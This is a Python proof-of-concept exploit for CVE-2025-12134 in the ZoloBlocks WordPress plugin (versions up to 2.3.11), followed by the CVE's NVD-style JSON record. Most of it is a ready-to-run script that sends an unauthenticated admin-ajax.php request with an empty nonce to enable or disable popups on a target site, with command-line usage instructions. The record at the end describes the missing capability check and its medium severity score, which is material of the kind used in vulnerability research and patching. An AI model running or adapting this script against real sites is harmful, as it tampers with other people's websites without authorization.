CVE-2025-12134

import requests import sys # CVE-2025-12134 PoC - Unauthorized Popup Status Modification # Target: WordPress sites with ZoloBlocks plugin <= 2.3.11 def exploit_unauthorized_popup_modification(target_url, popup_id, disable=True): """ Exploit for CVE-2025-12134 Allows unauthenticated attackers to enable/disable popups Args: target_url: Base URL of the WordPress site popup_id: ID of the popup to modify disable: True to disable, False to enable """ status = 'disable' if disable else 'enable' # Method 1: Using admin-ajax.php endpoint = f"{target_url}/wp-admin/admin-ajax.php" data = { 'action': 'update_popup_status', 'popup_id': popup_id, 'status': status, 'security': '' # No nonce required due to vulnerability } print(f"[*] Targeting: {target_url}") print(f"[*] Popup ID: {popup_id}") print(f"[*] Action: {status}") try: response = requests.post(endpoint, data=data, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[+] Response status code: {response.status_code}") print(f"[+] Response: {response.text[:200]}") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-12134.py <target_url> <popup_id> [enable|disable]") print("Example: python cve-2025-12134.py http://target.com 123 disable") sys.exit(1) target = sys.argv[1] popup_id = sys.argv[2] action = sys.argv[3].lower() if len(sys.argv) > 3 else 'disable' exploit_unauthorized_popup_modification(target, popup_id, action == 'disable')

{"cve": {"id": "CVE-2025-12134", "sourceIdentifier": "[email protected]", "published": "2025-10-24T10:15:38.010", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ZoloBlocks – Gutenberg Block Editor Plugin with Advanced Blocks, Dynamic Content, Templates & Patterns plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the update_popup_status() function in all versions up to, and including, 2.3.11. This makes it possible for unauthenticated attackers to enable/disable popups."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3377160", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/da9f89a2-f816-4445-8aea-11b622451ee9?source=cve", "source": "[email protected]"}]}}